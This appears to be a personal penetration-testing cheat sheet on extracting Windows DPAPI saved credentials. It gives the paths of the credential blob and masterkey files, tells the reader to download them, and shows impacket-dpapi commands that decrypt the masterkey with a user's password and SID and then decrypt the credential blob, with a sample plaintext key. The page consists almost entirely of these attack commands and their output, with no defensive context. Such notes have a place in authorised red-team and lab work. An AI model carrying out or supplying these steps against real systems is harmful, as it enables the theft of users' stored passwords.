CRD - DPAPI Credentials

1.0 Blob and Masterkey

1.1 Blob

You can find the blob file in users directory:

%appdata%microsoft\credentials\

For example, the blob is named: C8D69EBE9A43E9DEBF6B5FBD48B521B9

Download the file on your local machine.

1.2 Masterkey

The masterkey is located in the protected directory:

%appdata%microsoft\protect\<SID>

In this case, the file is named: 556a2412-1275-4ccf-b721-e6a0b4f90407

Download this file, too.

2.0 Decrypting

2.1 Decrypting the masterkey

impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -password p4ss -sid S-1-5-21-1487982659-1829050783-2281216199-1107

You will get the plaintext masterkey as result, e.g.:

0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

2.2 Decrypting the blob

impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

hckhsn

Explorer

CRD - DPAPI Credentials

CRD - DPAPI Credentials

1.0 Blob and Masterkey

1.1 Blob

1.2 Masterkey

2.0 Decrypting

2.1 Decrypting the masterkey

2.2 Decrypting the blob

References

Graphansicht

Inhaltsverzeichnis